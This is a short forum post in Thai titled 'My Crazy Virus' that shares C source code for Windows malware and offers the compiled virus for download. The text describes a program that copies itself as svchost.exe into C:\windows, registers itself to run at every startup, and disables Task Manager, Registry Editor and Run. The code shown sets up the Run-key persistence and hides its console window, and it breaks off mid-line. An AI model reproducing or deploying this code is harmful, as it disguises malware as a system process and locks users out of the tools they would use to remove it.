[SIZE=3]My Crazy Virus</span>
[hide=25]
การทำงาน จะเป็นการสร้างไฟล์ที่ชื่อ svchost.exe ไว้ที่c:\windows\ แล้วสร้างพาร์ทไว้ในรีจิสทรี
เพื่อให้ทำงานทุกครั้งที่มีการเปิดเครื่อง และมีการแก้ใขค่าในรีจิสทรี เพื่อปิดการทำงาน Windows Task Manager,
Registry Editor, Run ไฟล์svchost.exeจะทำงานทุกๆ1วิเลยน่ะครับ-->Sleep(1000) ...
ลองศึกษา Code ดูน่ะครับ คงอธิบายได้ไม่ละเอียดพอ ไม่รู้จักภาษาCมากนัก
มีไฟล์ไวรัสตัวนี้ให้Downloadกันด้วยน่ะครับ

1. :
CODE
[code]
#include <windows.h>
#include <stdio.h>
#define FALSE 0

int main ( void )
{
SetConsoleTitle("Firtina King Coders");
system("color 0a");
HKEY hkey;
char *path = "c:\\windows\\svchost.exe";
RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
RegSetValueEx((HKEY)hkey,"firtina",0,REG_SZ,(BYTE *)path,strlen(path));
HWND pencere;
AllocConsole();
pencere=FindWindowA("ConsoleWindowClass",NULL);
EnableWindow(pencere,FALSE);
HWND islem;
if(islem=FindWindow(NULL,"Windows G